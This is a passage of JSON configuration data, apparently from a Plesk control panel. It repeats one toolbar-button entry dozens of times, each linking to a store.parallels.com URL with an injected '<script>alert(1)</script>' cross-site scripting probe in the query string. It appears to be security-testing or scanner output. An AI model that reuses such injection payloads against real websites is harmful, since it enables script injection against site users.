Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 